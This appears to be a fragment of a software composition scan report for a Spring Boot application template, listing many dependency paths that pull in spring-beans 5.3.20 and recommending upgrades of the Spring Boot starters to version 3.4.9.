  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework.data:spring-data-commons@4.0.0-M6 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-web@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.9.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
